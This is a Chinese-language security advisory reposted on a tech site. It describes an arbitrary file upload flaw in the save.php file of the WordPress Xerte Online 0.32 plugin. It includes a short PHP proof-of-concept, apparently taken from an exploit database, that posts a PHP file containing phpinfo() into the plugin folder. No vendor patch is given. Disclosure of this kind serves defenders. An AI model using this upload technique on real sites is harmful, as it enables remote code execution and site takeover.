当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

WordPress Xerte Online插件save.php任意文件上传漏洞及修复

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

 受影响系统:

WordPress Xerte Online 0.32

描述:

 Xerte Online for WordPress是基于服务器的内容作者的工具集。

 

Xerte Online for WordPress内存在安全漏洞,wp-content/plugins/xerte-online/xertefiles/save.php允许上传带有任意扩展名的文件到webroot内的文件夹,通过提交恶意的PHP脚本,可导致任意PHP代码执行。

 

 

 

测试方法:

 

 

以下程序(方法)可能带有攻击性,涛涛电脑知识网,涛涛电脑知识网,仅供安全研究与教学之用。使用者风险自负!

 

Exploit :

 

PostShell.php

<?php

 

$code = "<? phpinfo(); ?>"; 

$ch = curl_init("");

curl_setopt($ch, CURLOPT_POST, true);   

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",

        'filedata'=>"$code"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

 

?>

 

 

Shell Access :

 

 

# Site : 1337day.com Inj3ct0r Exploit Database

 

建议:

厂商补丁:

 

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1